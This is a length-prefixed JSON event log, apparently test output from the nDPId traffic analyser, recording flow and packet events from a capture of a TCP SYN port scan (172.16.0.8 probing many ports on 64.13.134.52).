-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1439,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1429,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060641,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":81,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1439,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1429,"flow_packet_id":1,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060641,"pkt":"ACYLMQczACWzv5HuCABFAAAsExMAADIGA2CsEAAIQA2GNIzTAFHdU4MZAAAAAGACDAAsOwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1440,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1430,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060641,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3889,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1440,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1430,"flow_packet_id":1,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060641,"pkt":"ACYLMQczACWzv5HuCABFAAAsn2EAACsGfhGsEAAIQA2GNIzSDzHdUoMYAAAAAGACEAAZXgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1441,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1431,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060641,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6565,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1441,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1431,"flow_packet_id":1,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060641,"pkt":"ACYLMQczACWzv5HuCABFAAAs4qcAADsGKsusEAAIQA2GNIzSGaXdUoMYAAAAAGACEAAO6gAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1442,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1432,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060641,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1442,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1432,"flow_packet_id":1,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060641,"pkt":"ACYLMQczACWzv5HuCABFAAAsIwwAACcG\/masEAAIQA2GNIzSB9fdUoMYAAAAAGACEAAguAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1443,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1433,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060641,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3269,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1443,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1433,"flow_packet_id":1,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060641,"pkt":"ACYLMQczACWzv5HuCABFAAAs8L8AADYGIbOsEAAIQA2GNIzSDMXdUoMYAAAAAGACDAAfygAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1444,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1434,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060641,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1444,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1434,"flow_packet_id":1,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060641,"pkt":"ACYLMQczACWzv5HuCABFAAAstuoAADMGXoisEAAIQA2GNIzSA+jdUoMYAAAAAGACEAAkpwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1445,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1435,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060641,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2492,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1445,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1435,"flow_packet_id":1,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060641,"pkt":"ACYLMQczACWzv5HuCABFAAAsXSkAADsGsEmsEAAIQA2GNIzSCbzdUoMYAAAAAGACEAAe0wAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1446,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1436,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060641,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2710,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1446,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1436,"flow_packet_id":1,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060641,"pkt":"ACYLMQczACWzv5HuCABFAAAsPRsAADsG0FesEAAIQA2GNIzSCpbdUoMYAAAAAGACEAAd+QAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1447,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1437,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060642,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1447,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1437,"flow_packet_id":1,"flow_last_seen":1278275060642,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060642,"pkt":"ACYLMQczACWzv5HuCABFAAAsWbIAACUGycCsEAAIQA2GNIzSE4zdUoMYAAAAAGACCAAdAwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1448,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1438,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060642,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1448,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1438,"flow_packet_id":1,"flow_last_seen":1278275060642,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060642,"pkt":"ACYLMQczACWzv5HuCABFAAAsW3wAADkGs\/asEAAIQA2GNIzSHRPdUoMYAAAAAGACCAATfAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1449,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1439,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060642,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27352,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1449,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1439,"flow_packet_id":1,"flow_last_seen":1278275060642,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060642,"pkt":"ACYLMQczACWzv5HuCABFAAAsRWcAADIG0QusEAAIQA2GNIzSatjdUoMYAAAAAGACDADBtgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1450,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1440,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060642,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1450,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1440,"flow_packet_id":1,"flow_last_seen":1278275060642,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060642,"pkt":"ACYLMQczACWzv5HuCABFAAAsMg8AACsG62OsEAAIQA2GNIzSG1zdUoMYAAAAAGACEAANMwAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1451,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1441,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060642,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":52673,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1451,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1441,"flow_packet_id":1,"flow_last_seen":1278275060642,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060642,"pkt":"ACYLMQczACWzv5HuCABFAAAsul8AACgGZhOsEAAIQA2GNIzSzcHdUoMYAAAAAGACBABmzQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1452,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1442,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060642,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8081,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1452,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1442,"flow_packet_id":1,"flow_last_seen":1278275060642,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060642,"pkt":"ACYLMQczACWzv5HuCABFAAAsl44AAC0Gg+SsEAAIQA2GNIzSH5HdUoMYAAAAAGACCAAQ\/gAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1453,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1443,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060642,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49175,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1453,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1443,"flow_packet_id":1,"flow_last_seen":1278275060642,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060642,"pkt":"ACYLMQczACWzv5HuCABFAAAshnQAADQGjf6sEAAIQA2GNIzSwBfdUoMYAAAAAGACBAB0dwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1454,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1444,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060643,"flow_last_seen":1278275060643,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060643,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3322,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1454,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1444,"flow_packet_id":1,"flow_last_seen":1278275060643,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060643,"pkt":"ACYLMQczACWzv5HuCABFAAAs1cMAADEGQa+sEAAIQA2GNIzTDPrdU4MZAAAAAGACCAAjkgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1455,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1445,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060644,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1455,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1445,"flow_packet_id":1,"flow_last_seen":1278275060644,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060644,"pkt":"ACYLMQczACWzv5HuCABFAAAsdoQAACoGp+6sEAAIQA2GNIzTFqndU4MZAAAAAGACDAAV4wAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1456,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1446,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060644,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":13,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1456,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1446,"flow_packet_id":1,"flow_last_seen":1278275060644,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060644,"pkt":"ACYLMQczACWzv5HuCABFAAAsFmcAAC4GBAysEAAIQA2GNIzTAA3dU4MZAAAAAGACDAAsfwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1457,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1447,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060644,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3871,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1457,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1447,"flow_packet_id":1,"flow_last_seen":1278275060644,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060644,"pkt":"ACYLMQczACWzv5HuCABFAAAsgdcAACwGmpusEAAIQA2GNIzTDx\/dU4MZAAAAAGACBAAlbQAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1458,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1448,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060644,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":51103,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1458,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1448,"flow_packet_id":1,"flow_last_seen":1278275060644,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060644,"pkt":"ACYLMQczACWzv5HuCABFAAAsLsYAACgG8aysEAAIQA2GNIzTx5\/dU4MZAAAAAGACBABs7AAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1459,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1449,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060644,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2809,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1459,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1449,"flow_packet_id":1,"flow_last_seen":1278275060644,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060644,"pkt":"ACYLMQczACWzv5HuCABFAAAsiAkAADEGj2msEAAIQA2GNIzTCvndU4MZAAAAAGACCAAlkwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1460,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1450,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060644,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2135,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1460,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1450,"flow_packet_id":1,"flow_last_seen":1278275060644,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060644,"pkt":"ACYLMQczACWzv5HuCABFAAAs8b4AAC8GJ7SsEAAIQA2GNIzTCFfdU4MZAAAAAGACEAAgNQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1461,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1451,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060644,"flow_last_seen":1278275060644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060644,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":37,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1461,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1451,"flow_packet_id":1,"flow_last_seen":1278275060644,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060644,"pkt":"ACYLMQczACWzv5HuCABFAAAs48AAACcGPbKsEAAIQA2GNIzTACXdU4MZAAAAAGACEAAoZwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1462,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1452,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060661,"flow_last_seen":1278275060661,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060661,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1462,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1452,"flow_packet_id":1,"flow_last_seen":1278275060661,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060661,"pkt":"ACYLMQczACWzv5HuCABFAAAsBW4AADIGEQWsEAAIQA2GNIzTDQXdU4MZAAAAAGACDAAfhwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1463,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1453,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060661,"flow_last_seen":1278275060661,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060661,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 